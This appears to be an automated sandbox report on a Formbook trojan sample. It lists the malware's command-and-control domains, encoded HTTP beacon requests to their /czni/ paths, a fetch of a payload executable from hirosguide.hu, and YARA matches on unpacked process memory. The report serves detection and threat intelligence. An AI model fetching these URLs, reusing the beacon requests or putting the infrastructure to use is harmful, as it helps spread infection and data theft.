          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 30 Jan 2023 12:42:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 273Connection: closeVary: Accept-Encoding Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.51 (Unix) Server at www.hougou.ru Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 30 Jan 2023 12:42:32 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.44yyds.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.44yyds.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arritalvigo.comwww.arritalvigo.com20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000000.417335340.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827550131.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chimid.org
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chimid.org/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyz
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyz/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.deglaz.xyzwww.deglaz.xyz20=4xfPiv3RnEaY
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dellaone.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dellaone.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloud/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.genuineinsights.cloudwww.genuineinsights.cloud20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.site
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.site/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hayethe.sitewww.hayethe.site20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ru/czni/ev
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hougou.ruwww.hougou.ru20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lakeviewautomation.comwww.lakeviewautomation.com20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laylaroseuk.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.laylaroseuk.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.octohoki.net/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.panalobet88.net
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.panalobet88.net/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.online/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.toporsche.onlinewww.toporsche.online20=4xfPiv3RnE
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.versusfinances.tech/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com
          Source: explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.com/czni/
          Source: explorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yeah-go.comwww.yeah-go.com20=4xfPiv3RnE
          Source: wscript.exe, 00000000.00000003.304596761.000001B34911D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hirosguide.hu/ti/winner.exe
          Source: unknownHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.toporsche.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.toporsche.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.toporsche.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: unknownDNS traffic detected: queries for: hirosguide.hu
          Source: global trafficHTTP traffic detected: GET /ti/winner.exe HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: hirosguide.huConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE HTTP/1.1Host: www.toporsche.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=q4vOuZlu2gw387VDV10PDpiWTFl2xG2mj37j5EK3EACa1yxM1cLCbJZ7QUgC2jLM/Tg8TnJqujzMrtpKg/UGeVYytsfF/XPvWg== HTTP/1.1Host: www.chimid.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=06gIUCFIBOa1TNKOgihx1QaHEyCsoo2zVarqfXE1BGhN6bynIxp2kNvfG92v3asKvvgl0gKrl2tBRyImUhoMMpO0yMdYVRtJxA==&20=4xfPiv3RnE HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew== HTTP/1.1Host: www.44yyds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE HTTP/1.1Host: www.yeah-go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE HTTP/1.1Host: www.deglaz.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg== HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE HTTP/1.1Host: www.lakeviewautomation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=pjpdKCpJnNXPdeWbwYyFkbOLSaKVTVa2roCT8abPBwtlkFjZcqcvSY6Wc82/f3EmpMB4AQ+PhDNFqdOW9DbfejlZOApCjfoJ4Q== HTTP/1.1Host: www.dellaone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE HTTP/1.1Host: www.arritalvigo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== HTTP/1.1Host: www.versusfinances.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE HTTP/1.1Host: www.hayethe.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE HTTP/1.1Host: www.hougou.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1Host: www.panalobet88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 91.227.138.48:443 -> 192.168.2.5:49703 version: TLS 1.2

          E-Banking Fraud

          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
